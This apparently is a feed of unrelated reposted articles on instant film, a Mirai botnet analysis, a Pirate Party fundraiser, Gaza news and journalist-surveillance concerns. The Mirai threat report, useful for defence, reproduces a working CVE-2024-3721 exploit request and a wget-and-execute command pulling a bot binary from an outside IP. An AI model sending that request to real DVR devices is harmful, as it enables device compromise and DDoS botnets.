We recently published an affectionate look at a Polaroid Land camera, whose peel-apart instant film is long out of production except for a very few single exposure packs form a boutique manufacturer. All that was left was a discussion of modifying it for conventional roll film, or perhaps hacking a modern back-to-front Polaroid sheet into it.

Never say never though, because along come the Chinese company Light Lens Lab with a short announcement at the end of a post talking about grain structures and anti-halation layer materials for their black and white film.

Lastly, with our future development plan, we are currently developing and researching instant peel-apart film, with plans on producing and making available black and white peel-apart film by 2025 in various format. We aim to have an update on our packaging and test shot for the next development/research progress installment. We are also researching, developing and producing colour reversal films that consist of a dye-incorporating development process, commonly known as K-14, for 135 and 120 formats in 2026.

So there you go, no sooner has Hackaday declared a format unavailable, than it shows every sign of reappearing. At this point we’d like to take the opportunity to report that McDonalds Szechuan Chicken McNugget sauce will never ever be available again.

So what does this mean? First of all, assuming that the stuff doesn’t need the GDP of a small country to buy in Europe, the Hackaday Polaroid 104 will be able to shoot in its native format again. But perhaps more interestingly, it opens up a new option for the camera hacker. Pack film is much easier than modern instant film to deal with; it requires only rollers and someone to tug on that paper tab, no gears or motors involved. We’re here for this.

The observant will also have noted at the end of the announcement, mention of a dye-incorporating development process. This refers to the colour chemistry seen in Kodachrome, a long-extinct single-layer film that offered legendarily sharp and vibrant-coloured pictures at the expense of a very complex development path. We’d love to see it, but we’ll take the instant pack film and run.

The Hackaday Land camera is here.

hackaday.com/2025/06/06/in-fil…

The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.

We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.

Exploitation

During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a CVE-2024-3721. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:
"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"
The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.
cd /tmp; rm arm7; wget 42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.

Malware implant – Mirai variant

The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.

The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.

Data decryption

The data decryption routine in this variant is implemented as a simple RC4 algorithm.

The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: 6e7976666525a97639777d2d7f303177.

The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted structure, which is a simple string list:

Data decryption routine

The global linked list with decrypted data is accessed whenever the malware needs particular strings.

Adding decrypted strings to the global list

Anti-VM and anti-emulation

To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc directory, which is the proc filesystem on Linux.

Each process ID (PID) has its own folder containing useful information, such as cmdline, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with VMware or QEMU-arm in their command line.

Process check

The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:

Allowed directories

Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.

Infection statistics

According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.

Conclusion

Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.

The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.

All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Indicators of compromise

Host-based (MD5 hashes)
011a406e89e603e93640b10325ebbdc8
24fd043f9175680d0c061b28a2801dfc
29b83f0aae7ed38d27ea37d26f3c9117
2e9920b21df472b4dd1e8db4863720bf
3120a5920f8ff70ec6c5a45d7bf2acc8
3c2f6175894bee698c61c6ce76ff9674
45a41ce9f4d8bb2592e8450a1de95dcc
524a57c8c595d9d4cd364612fe2f057c
74dee23eaa98e2e8a7fc355f06a11d97
761909a234ee4f1d856267abe30a3935
7eb3d72fa7d730d3dbca4df34fe26274
8a3e1176cb160fb42357fa3f46f0cbde
8d92e79b7940f0ac5b01bbb77737ca6c
95eaa3fa47a609ceefa24e8c7787bd99
96ee8cc2edc8227a640cef77d4a24e83
aaf34c27edfc3531cf1cf2f2e9a9c45b
ba32f4eef7de6bae9507a63bde1a43aa
IPs
116.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36

securelist.com/mirai-botnet-va…

Dear Friends of the Pirate Community,

PPI is heading again to the Internet Governance Forum (IGF), this time in Norway. The IGF is a UN event that brings together a large number of governments and non-profit organizations. PPI has attended the IGF for about 10 years now. As part of our effort to attend the event, we are conducting a fundraiser to collect up to 1500 euros to support our representatives. Donations can be made directly on our website or through the following crowdfunding campaign: fundrazr.com/b2Yiz8

PPI was accepted to organize a workshop entitled “Ethical Networking: Sustainability and Accountability” will be on June 23rd at 16:15 in Workshop Room 2, Hall C: intgovforum.org/en/content/igf…

We will also be presenting at a booth with the European Pirate Party.

We are attempting to fundraise some of the costs of our representatives who will be paying out of their own pocket to attend the event. Being in Norway this year, means that it will not be cheap. Any financial assistance would be greatly appreciated.

As a way to further motivate fundraising, we have also provided an incentive to include individual membership in PPI, which normally costs 10 euros, for those who provide at least a 15 euro donation.

The entire event is from June 23rd to 27th. Please review the IGF website as the date nears for information about participating online: intgovforum.org/en/content/igf…

All approved events can be seen here: intgovforum.org/en/content/igf…

Last year in Saudi Arabia we also organized a workshop on Autarchy, spearheaded by Alexander Isavnin: intgovforum.org/en/content/igf…

Two years ago we had a booth in Japan: pp-international.net/2023/10/i…

The year before that PPI had a booth in Poland: pp-international.net/2021/12/p…

At the moment PPI does not have any extra funding for this event. Every PPI representative is self-funded. By making a donation you will provide partial assistance for one of our representatives to attend.

pp-international.net/2025/06/i…

Satellite images show a new militia operating in southern Gaza in an area under IDF control, and a former Israeli defense minister claimed Israel is arming an ISIS-affiliated militia in Gaza to counter Hamas. In response, PM Netanyahu's office said the country is "working to defeat Hamas in various ways."

Se fosse vero sarebbe l'ennesima prova di quanto Israele sia sceso in basso.

We exposed as a lie the Trump administration’s basis for repealing restrictions on surveilling journalists to investigate leaks. The “fake news” that the administration claimed to be combating — reports that the intelligence community disputed its claim that the Venezuelan government directed the activities of the Tren de Aragua gang in the United States – was, in fact, 100 percent accurate.

But just in case that bombshell and the widespread news coverage that followed doesn’t shame the administration into changing course, Freedom of the Press Foundation (FPF) hosted a discussion about past efforts by the government to out reporters’ sources and what journalists should expect when federal prosecutors come after their newsgathering.

Our panelists would know better than most. Former New York Times reporter and Pulitzer Prize-winner James Risen fought a seven-year battle against attempts by both the George W. Bush and Barack Obama administrations to force him to testify and reveal his sources in a leak investigation. He detailed the Obama administration’s endless litigation against him, while at the same time it engaged in secret digital surveillance of his communications.

Ryan Lizza, the founder and editor of Telos.news and a former reporter at Politico, CNN, and The New Yorker, also joined to discuss his reporting on the Obama administration’s overreach in secretly spying on Fox News reporter James Rosen, as well as efforts by former U.S. representative and current Trump sycophant Devin Nunes to obtain Lizza’s communications from tech companies in separate litigation.

And Lauren Harper, Daniel Ellsberg chair on government secrecy at FPF, discussed the aforementioned revelations about the Trump administration’s false pretexts for cracking down on leaks, which she obtained through the Freedom of Information Act.

youtube.com/embed/5_SDsXS5s8g?…

Risen started by laying out the stakes that emerged after 9/11. “Basically everything about the American conduct in the war on terror was classified,” he explained. “Everything that we now take for granted about our body of knowledge about how the United States conducts warfare in the 21st century came through leaks or unauthorized disclosures of one form or another.”

Lizza agreed, adding that critics of the Iraq War in the current administration would not have been able to mount their criticisms without leaks. Politicians, he explained, use leaked information to form the basis for their political platforms and then turn against leakers when they’re the ones in power.

Harper disputed the administration’s apparent belief that the solution to leaks is more secrecy, not less. “Upwards of 90% of information that is classified ought not to be. So I think in some ways, we can look at leaks as a response to a broken classification system,” she said.

Risen observed that the Obama administration finally backed down from forcing him to testify not due to the law but due to bad press. Lizza had similar impressions from his coverage of the Rosen case, explaining that his reporting “got the ear of some people in the Obama administration who did not like being accused of attacking the First Amendment and going after reporters.”

As Risen explained, when the government comes after journalists it’s often not about finding out who they’re talking to, it’s about “having a chilling effect on journalism in general and making sure everybody is afraid of the government.” Added Risen, “They’ll go after journalists not because they need them, but because they want to punish them and set an example.”

It remains to be seen whether the Trump administration will respond to public shaming like Obama did, but we won’t know unless we try. First, the press needs to avoid surveillance, by implementing digital security best practices when storing data and communicating electronically with sources, but also, as Risen said, going “off the grid” and communicating face-to-face whenever possible.

When that fails and the government comes after journalists’ sources anyway, it’s imperative that the press stand up for itself and its sources, by raising alarms about the risks to investigative reporting and press freedom when the government is able to snoop into reporters’ notebooks and emails. Caving to the pressure only encourages more retaliation.

freedom.press/issues/burn-afte…